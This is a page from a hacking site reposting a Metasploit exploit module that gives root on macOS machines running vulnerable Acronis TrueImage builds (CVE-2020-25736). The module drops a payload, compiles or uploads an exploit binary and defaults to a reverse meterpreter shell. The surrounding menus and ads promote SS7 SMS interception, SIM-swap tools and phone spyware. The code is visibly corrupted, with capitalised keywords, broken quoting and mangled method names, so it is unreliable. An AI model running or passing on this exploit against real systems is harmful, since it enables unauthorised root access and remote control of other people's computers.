• Advertise
  • SS7 Hacking
Tuesday, January 31, 2023
No Result
View All Result
I Need Hack - Hacking Tutorials, News, Tips
  • Home
  • Exploits

    Broadcast Signal Intrusion – Hacking Radio Stations

    PHPJabbers Car Park Booking System 2.0 Cross Site Scripting

    Zstore 6.6.0 Cross Site Scripting

    PHPJabbers Event Ticketing System Script 1.0 Cross Site Scripting

    PHPJabbers Travel Tours Script 1.0 SQL Injection

    PHPJabbers Travel Tours Script 1.0 Cross Site Scripting

    PHPJabbers Property Listing Script 3.1 SQL Injection

    PHPJabbers Property Listing Script 3.1 Cross Site Scripting

    Razer Synapse 3.7.0731.072516 Local Privilege Escalation

    Trending Tags

    • sms exploit
    • ss7 software
    • simswap software
    • jpg exploit
    • kali linux
  • Hacking News
    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    TROJANPUZZLE Attack Forces AI Assistants to Suggest Rogue Coding

    Multiple Vulnerabilities Found In Samsung Galaxy App Store App

    Researchers Find Class Pollution-A Prototype Pollution Variant That Affects Python

    Be on the lookout for this AnyDesk Phishing campaign that delivers Vidar info stealer

    Brave Browser turns your device into a proxy for others via “Snowflake” Feature

    This tool, “telerwaf”, protects go apps from web-based attacks

  • Hacking Tools

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

    Trending Tags

    • hacking tools
    • hacking software
    • hacking tips
    • ss7 attacks
    • simswap software
    • sms exploit
  • Hacking Tutorials

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

  • Kali Linux
    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    The Terminal Application Cypherhound contains 260+ Neo4j Cyphers for BloodHound DataSets

    Subparse: Modular Malware Analysis Artifact Collection And Correlation Framework

    AzureHound : Azure Data Exporter For BloodHound

    Xerror is an automated penetration testing tool with GUI

    Mongoaudit is an audit and pentesting tool for MongoDB databases

    ADFSRelay – Proof of Concept Utilities Developed For Researching NTLM Relaying Attacks Targeting ADFS

    Azure Sentinel protects Kubernetes deployments

    Trending Tags

    • kali linux
    • kali tools
    • hacking tools kali
    • kali hacking
    • pentesting
  • Security
    Facebook & Instagram Flaw Let Anyone Bypass Two-factor Authentication

    Facebook & Instagram Flaw Let Anyone Bypass Two-factor Authentication

    U.S. No Fly List Leaked on Hacker Forum

    U.S. No Fly List Leaked on Hacker Forum

    Hackers Exploiting Unpatched Exchange Servers in The Wild

    Hackers Exploiting Unpatched Exchange Servers in The Wild

    Critical Realtek Vulnerability Impacting IoT Devices Worldwide

    Critical Realtek Vulnerability Impacting IoT Devices Worldwide

    New Research Uncovers Threat Actor Behind Infamous Golden Chickens Malware-as-a-Service

    New Research Uncovers Threat Actor Behind Infamous Golden Chickens Malware-as-a-Service

    Doctor Paid $60k in Bitcoin to Hire Dark Web Hitmen

    Doctor Paid $60k in Bitcoin to Hire Dark Web Hitmen

    What is Word Unscrambler In Gaming?

    What is Word Unscrambler In Gaming?

    Yandex Source Code Online Leaked, Company Denies Hack

    Yandex Source Code Online Leaked, Company Denies Hack

    Extradited Alleged ShinyHunters Hacker Pleads Not Guilty in US Court

    Extradited Alleged ShinyHunters Hacker Pleads Not Guilty in US Court

  • Advertise
  • Home
  • Exploits

    Broadcast Signal Intrusion – Hacking Radio Stations

    PHPJabbers Car Park Booking System 2.0 Cross Site Scripting

    Zstore 6.6.0 Cross Site Scripting

    PHPJabbers Event Ticketing System Script 1.0 Cross Site Scripting

    PHPJabbers Travel Tours Script 1.0 SQL Injection

    PHPJabbers Travel Tours Script 1.0 Cross Site Scripting

    PHPJabbers Property Listing Script 3.1 SQL Injection

    PHPJabbers Property Listing Script 3.1 Cross Site Scripting

    Razer Synapse 3.7.0731.072516 Local Privilege Escalation

    Trending Tags

    • sms exploit
    • ss7 software
    • simswap software
    • jpg exploit
    • kali linux
  • Hacking News
    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    TROJANPUZZLE Attack Forces AI Assistants to Suggest Rogue Coding

    Multiple Vulnerabilities Found In Samsung Galaxy App Store App

    Researchers Find Class Pollution-A Prototype Pollution Variant That Affects Python

    Be on the lookout for this AnyDesk Phishing campaign that delivers Vidar info stealer

    Brave Browser turns your device into a proxy for others via “Snowflake” Feature

    This tool, “telerwaf”, protects go apps from web-based attacks

  • Hacking Tools

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

    Trending Tags

    • hacking tools
    • hacking software
    • hacking tips
    • ss7 attacks
    • simswap software
    • sms exploit
  • Hacking Tutorials

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

  • Kali Linux
    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    The Terminal Application Cypherhound contains 260+ Neo4j Cyphers for BloodHound DataSets

    Subparse: Modular Malware Analysis Artifact Collection And Correlation Framework

    AzureHound : Azure Data Exporter For BloodHound

    Xerror is an automated penetration testing tool with GUI

    Mongoaudit is an audit and pentesting tool for MongoDB databases

    ADFSRelay – Proof of Concept Utilities Developed For Researching NTLM Relaying Attacks Targeting ADFS

    Azure Sentinel protects Kubernetes deployments

    Trending Tags

    • kali linux
    • kali tools
    • hacking tools kali
    • kali hacking
    • pentesting
  • Security
    Facebook & Instagram Flaw Let Anyone Bypass Two-factor Authentication

    Facebook & Instagram Flaw Let Anyone Bypass Two-factor Authentication

    U.S. No Fly List Leaked on Hacker Forum

    U.S. No Fly List Leaked on Hacker Forum

    Hackers Exploiting Unpatched Exchange Servers in The Wild

    Hackers Exploiting Unpatched Exchange Servers in The Wild

    Critical Realtek Vulnerability Impacting IoT Devices Worldwide

    Critical Realtek Vulnerability Impacting IoT Devices Worldwide

    New Research Uncovers Threat Actor Behind Infamous Golden Chickens Malware-as-a-Service

    New Research Uncovers Threat Actor Behind Infamous Golden Chickens Malware-as-a-Service

    Doctor Paid $60k in Bitcoin to Hire Dark Web Hitmen

    Doctor Paid $60k in Bitcoin to Hire Dark Web Hitmen

    What is Word Unscrambler In Gaming?

    What is Word Unscrambler In Gaming?

    Yandex Source Code Online Leaked, Company Denies Hack

    Yandex Source Code Online Leaked, Company Denies Hack

    Extradited Alleged ShinyHunters Hacker Pleads Not Guilty in US Court

    Extradited Alleged ShinyHunters Hacker Pleads Not Guilty in US Court

  • Advertise
No Result
View All Result
I Need Hack - Hacking Tutorials, News, Tips
SS7 SMS Intercept SS7 SMS Intercept SS7 SMS Intercept
Home Exploits

Acronis TrueImage XPC Privilege Elevation

by Ineedhack
December 16, 2022
in Exploits
0
79
SHARES
493
VIEWS
Share on FacebookShare on Twitter
Kripkey Spy Phone Kripkey Spy Phone Kripkey Spy Phone

##
# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

class MetasploitModule < Msf::Exploit::Local

Rank = ExcellentRanking

Include Msf.:Post:File

Include Msf.:Post:Common

Include Msf.:Post:Process

include Msf::Exploit::EXE

include Msf::Exploit::FileDropper

prepend Msf::Exploit::Remote::AutoCheck

def initialize (info = ).

super(

update_info(

info,

Name> => Acronis TrueImage XPC Privilege Eescalation’

‘Description’ => %q{

Acronis TrueImage 2019 updates 1 through 221 update 1

Privilege escalation is possible. The `com.acronis.trueimagehelper`

Helper Tool does not validate clients that they are connected.

This allows clients to perform functions that are provided by the server.

By the helper tool that grants root privileges.

},

‘License’ => MSF_LICENSE,

‘Author’ => [

‘Csaba Fitzl’, # @theevilbit – Vulnerability Discovery

“Shelby Pace” # Metasploit Module, and Objective-c Code

],

‘Platform’ => [ ‘osx’ ],

‘Arch’ => [ ARCH_X64 ],

‘SessionTypes’ => [ ‘shell’, ‘meterpreter’ ],

‘Targets’ => [[ ‘Auto’, {} ]],

‘Privileged’ => true,

‘References’ => [

[ ‘CVE’, ‘2020-25736’ ],

[ ‘URL’, ‘https://kb.acronis.com/content/68061’ ],

[ ‘URL’, ‘https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736’ ]

],

‘DefaultOptions’ => {

‘PAYLOAD’ => ‘osx/x64/meterpreter/reverse_tcp’,

‘WfsDelay’ => 15

},

‘DisclosureDate’ => ‘2020-11-11’,

‘DefaultTarget’ => 0,

‘Notes’ => {

‘Stability’ => [ CRASH_SAFE ],

‘Reliability’ => [ REPEATABLE_SESSION ],

‘SideEffects’ => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]

}

)

)

register_options([

OptString.new(‘WRITABLE_DIR’, [ true, ‘Writable directory to write the payload to’, ‘/tmp’ ]),

OptString.new(‘SHELL’, [ true, ‘Shell to use for executing payload’, ‘/bin/zsh’ ]),

OptEnum.new(‘COMPILE’, [ true, ‘Compile exploit on target’, ‘Auto’, [ ‘Auto’, ‘True’, ‘False’ ] ])

])

End

Def tmp_dir

datastore[‘WRITABLE_DIR’].to_s

End

def sys_shell

datastore[‘SHELL’].to_s

End

Def compile

datastore[‘COMPILE’]

End

Def compile_on_target

Return false, if compile == “False”

If compile == “Auto”

ret = cmd_exec(‘xcode-select -p’)

Return false for ret.include (‘error: unable’)

End

True

End

def exp_file_name

@exp_file_name ||= Rex::Text.rand_text_alpha(5..10)

End

def check

helper_location = ‘/Library/PrivilegedHelperTools’

helper_svc_names = [ ‘com.acronis.trueimagehelper’, ‘com.acronis.helpertool’ ]

plist = ‘/Applications/Acronis True Image.app/Contents/Info.plist’

unless helper_svc_names.any? { |svc_name| file? (“#helper_location/#svc_name”) }

Return CheckCode:

End

return CheckCode::Detected(‘Service found, but cannot determine version via plist’) unless file? (plist)

plutil_cmd = ‘plutil-extract CFBundleVersion plist ‘”}

build_no = cmd_exec(plutil_cmd)

return CheckCode::Detected(‘Could not retrieve build number from plist’) if build_no.blank?

build_no = build_no.to_i

vprint_status (“Found build #build_no”)

return CheckCode::Appears(‘Vulnerable build found’) if build_no > 14170 && build_no < 33610

CheckCode::Safe(‘Acronis version found is not vulnerable’)

End

def exploit

payload_name = Rex::Text.rand_text_alpha(7)

@payload_path = “#tmp_dir/#payload_name”

print_status(“Attempting to write payload at #@payload_path”)

unless upload_and_chmodx(@payload_path, generate_payload_exe)

fail_with(Failure::BadConfig, ‘Failed to write payload. You might consider changing the WRITABLE_DIR option.

End

vprint_good(“Successfully wrote payload at #@payload_path”)

@pid = get_valid_pid

exp_bin_path = “#tmp_dir/#exp_file_name”

If compile_on_target

exp_src = “#exp_file_name.m”

exp_path = “#tmp_dir/#exp_src”

compile_cmd = ‘gcc-framework Foundation #exp_path #exp_bin_path

Write_file (exp_path), objective_c_code

fail_with(Failure::BadConfig, ‘Failed to write Objective-C exploit to disk. WRITABLE_DIR might need to be modified’

End

register_files_for_cleanup(@payload_path, exp_path, exp_bin_path)

ret = cmd_exec(compile_cmd)

fail_with(Failure::UnexpectedReply, “Failed to compile #exp_src”) unless ret.blank?

print_status(“Successfully compiled #exp_src…Now executing payload”)

Other

print_status(“Using pre-compiled exploit #exp_bin_path”)

compiled_exploit = compiled_exp

unless upload_and_chmodx(exp_bin_path, compiled_exploit)

fail_with(Failure::BadConfig, ‘Failed to write compiled exploit. You might consider changing the WRITABLE_DIR option.

End

register_files_for_cleanup(exp_bin_path, @payload_path)

End

cmd_exec(exp_bin_path)

End

Def goal_c_code

file_contents = exploit_data(‘CVE-2020-25736’, ‘acronis-exp.erb’)

ERB.new(file_contents).result(binding)

rescue Errno::ENOENT

fail_with(Failure::NotFound, ‘ERB payload file not found’)

End

Def compiled_exp

compiled = exploit_data(‘CVE-2020-25736’, ‘acronis-exp.macho’)

compiled.gsub! (‘/tmp/payload’, @payload_path)

compiled.gsub! (‘/bin/zsh’, sys_shell)

compiled.gsub! (“xEFxBExADxDE”.force_encoding(‘ASCII-8BIT’), [@pid.to_i].pack(‘V’))

Compilation

End

def get_valid_pid

procs = get_processes

Return ‘1″ if procs.empty

len = procs.length

rand_proc = procs[rand(1…len)]

return ‘1’ if rand_proc[‘pid’].to_s.blank?

rand_proc[‘pid’].to_s

End

End

Tags: hack newshacking softwarehacking tipshacking toolshacking tutorialsinstagram hackjpg exploitsms exploit
Ineedhack

Ineedhack

Next Post

SOUND4 Server Service 4.0.2 Local Privilege Escalation

Sim Swap Software Sim Swap Software Sim Swap Software

Recommended

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

Microsoft Exchange AutoDiscover Design Flaw: The Great Leak

1 year ago

Inout Jobs Portal 2.2.2 SQL Injection

6 days ago

Popular News

    • Advertise
    • SS7 Hacking

    ©2017- 2022 Hacking Tutorials

    No Result
    View All Result
    • Home
    • Exploits
    • Hacking News
    • Hacking Tools
    • Hacking Tutorials
    • Kali Linux
    • Security
    • Advertise